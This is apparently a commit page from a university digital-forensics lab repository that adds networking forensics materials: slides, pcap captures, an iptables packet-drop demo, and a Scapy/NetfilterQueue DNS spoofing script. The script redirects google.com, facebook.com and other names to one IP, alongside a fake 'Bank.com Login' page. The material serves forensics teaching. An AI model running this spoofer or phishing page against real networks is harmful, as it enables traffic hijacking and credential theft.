digital-forensics-labs/digital-forensics-lab
1
0
Fork 0
mirror of https://github.com/frankwxu/digital-forensics-lab.git synced 2026-02-20 13:40:40 +00:00
Code Issues Packages Projects Releases Wiki Activity

add networking forensics draft. incompleted!

Browse Source
This commit is contained in:
Frank Xu
2023-03-15 22:11:36 -04:00
parent 66460ada03
commit 9def12dade
13 changed files with 172 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
Networking_Forensics/40_ARP_Poisoning_Forensics.pptx
View File

Binary file not shown.

BIN
Networking_Forensics/50_Firewall_Drop.pptx Normal file
View File

Binary file not shown.

BIN
Networking_Forensics/70_DNS.pptx Normal file
View File

Binary file not shown.

BIN
Networking_Forensics/80_DNS_Spoof_Forensics.pptx Normal file
View File

Binary file not shown.

BIN
Networking_Forensics/lab_files/dns/dig_dns.pcap Normal file
View File

Binary file not shown.

BIN
Networking_Forensics/lab_files/dns/http_dns.pcap Normal file
View File

Binary file not shown.

BIN
Networking_Forensics/lab_files/dns/http_ub_dns.pcap Normal file
View File

Binary file not shown.

0
Networking_Forensics/code/arp.py → Networking_Forensics/lab_files/dns_spoof/arp.py
View File

64
Networking_Forensics/lab_files/dns_spoof/dns_spoof.py Normal file
View File

@@ -0,0 +1,64 @@
# https://www.geeksforgeeks.org/how-to-make-a-dns-spoof-attack-using-scapy-in-python/
# https://www.thepythoncode.com/article/make-dns-spoof-python
import os
import logging as log
from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
from netfilterqueue import NetfilterQueue
class DnsSnoof:
def __init__(self, hostDict, queueNum):
self.hostDict = hostDict
self.queueNum = queueNum
self.queue = NetfilterQueue()
def __call__(self):
log.info("Snoofing....")
os.system(
f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
self.queue.bind(self.queueNum, self.callBack)
try:
self.queue.run()
except KeyboardInterrupt:
os.system(
f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
log.info("[!] iptable rule flushed")
def callBack(self, packet):
scapyPacket = IP(packet.get_payload())
if scapyPacket.haslayer(DNSRR):
try:
log.info(f'[original] { scapyPacket[DNSRR].summary()}')
queryName = scapyPacket[DNSQR].qname
if queryName in self.hostDict:
scapyPacket[DNS].an = DNSRR(
rrname=queryName, rdata=self.hostDict[queryName])
scapyPacket[DNS].ancount = 1
del scapyPacket[IP].len
del scapyPacket[IP].chksum
del scapyPacket[UDP].len
del scapyPacket[UDP].chksum
log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
else:
log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
except IndexError as error:
log.error(error)
packet.set_payload(bytes(scapyPacket))
return packet.accept()
if __name__ == '__main__':
try:
hostDict = {
b"google.com.": "136.160.215.15",
b"facebook.com.": "136.160.215.15",
b"ubalt.com.": "136.160.215.15",
b"g00gle.com.": "136.160.215.15",
}
queueNum = 1
log.basicConfig(format='%(asctime)s - %(message)s',
level = log.INFO)
snoof = DnsSnoof(hostDict, queueNum)
snoof()
except OSError as error:
log.error(error)

21
Networking_Forensics/lab_files/dns_spoof/index.html Normal file
View File

@@ -0,0 +1,21 @@
<!DOCTYPE html>
<html>
<head>
<title>Bank.com Login</title>
</head>
<body>
<h1>Bank.com Login</h1>
<form action="#" method="post">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required><br><br>
<input type="submit" value="Login">
</form>
</body>
</html>

13
Networking_Forensics/lab_files/firewall/hello.html Normal file
View File

@@ -0,0 +1,13 @@
<!DOCTYPE html>
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h1>Hello World! Network Forensics. </h1>
<p>Welcome to my simple web page.</p>
</body>
</html>

61
Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py Normal file
View File

@@ -0,0 +1,61 @@
#!/usr/bin/env python3
import argparse
import os
import signal
import sys
from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP
from scapy.sendrecv import send
def iptables_add_rule(ip_address):
os.system(f"iptables -A INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
def iptables_remove_rule(ip_address):
os.system(f"iptables -D INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
def handle_packet(packet):
ip = IP(packet.get_payload())
source_ip = ip.src
print(f"Receiving packet from {source_ip}")
if source_ip == args.source_ip:
print(f"Dropping packet from {source_ip}")
packet.drop()
print("================================")
def parse_arguments():
parser = argparse.ArgumentParser(description="Python script to demonstrate iptables functions")
parser.add_argument("source_ip", help="Source IP address to filter")
return parser.parse_args()
def main():
if os.geteuid() != 0:
print("You must be root to run this script.")
sys.exit(1)
global args
args = parse_arguments()
iptables_add_rule(args.source_ip)
q = NetfilterQueue()
q.bind(1, handle_packet)
try:
print("Waiting incoming packets...")
q.run()
except KeyboardInterrupt:
print("Exiting...")
q.unbind()
iptables_remove_rule(args.source_ip)
print("Rules are removed...")
if __name__ == "__main__":
main()

13
Networking_Forensics/lab_files/firewall_forward/hello.html Normal file
View File

@@ -0,0 +1,13 @@
<!DOCTYPE html>
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h1>Hello World! Network Forensics. </h1>
<p>Welcome to my simple web page.</p>
</body>
</html>